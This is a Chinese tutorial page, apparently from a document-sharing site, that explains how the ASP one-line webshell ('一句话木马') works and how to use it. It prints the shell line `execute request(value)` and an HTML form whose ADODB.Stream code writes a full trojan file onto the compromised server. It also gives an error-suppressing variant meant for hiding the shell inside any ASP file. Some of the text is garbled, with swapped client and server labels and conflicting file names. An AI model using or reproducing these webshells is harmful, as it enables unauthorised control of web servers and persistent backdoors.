一句话木马原理及利用.docVIP

一句话木马的原理及利用（asp,aspx,php,jsp） 一句话木马的适用环境：1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中也可一句话木马的工作原理：一句话木马服务端（本地的html提交文件）就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为 %execute request(value)% 其中value可以自己修改一句话木马客户端（远程服务器上被插入一句话的asp文件）用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件现在先假设在远程主机的TEXT.ASP(客户端）中已经有了%execute request(value)%这个语句.)在ASP里%execute )%意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)form action=http://主机路径/TEXT.asp method=posttextarea name=value cols=120 rows=10 width=45set lP=server.createObject(Adodb.Stream)//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet=gb2312 //字体标准lP.writetext request(newvalue)lP.SaveToFile server.mappath(newmm.asp),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆 盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect newmm.asp //转向newmm.asp/textareatextarea name=newvalue cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbrinput type=submit value=提交/form表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有%execute request(value)%这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和%execute request(value)%里的VALUE一样,就是我用蓝色标记的那两处,必须相等)说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.具体的就是下面这一段:set lP=server.createObject(Adodb.Stream)//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet=gb2312 //字体标准lP.writetext request(newvalue)lP.SaveToFile server.mappath(newvalue.asp),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆 盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect newmm.asp //转向newmm.asp这样的话第二个表单的名字必须和lP.writetext request(newvalue) 里的Newvalue一样,就是我用红色标注的那两处.至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。关于服务器错误：经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:Script error detected at line 1.Source line: execute request(nettoo)Description: 类型不匹配: execute这个如何解决呢?想出了一个好办法,只要用eval替换掉execute服务端,就不会出错了!用一句话客户端连接，加入容错语句，你可以把它插入到任何ASP文件而不会像以前一样出错。%On Error Resume Next execute request(value)%常见asp一句话木马的变体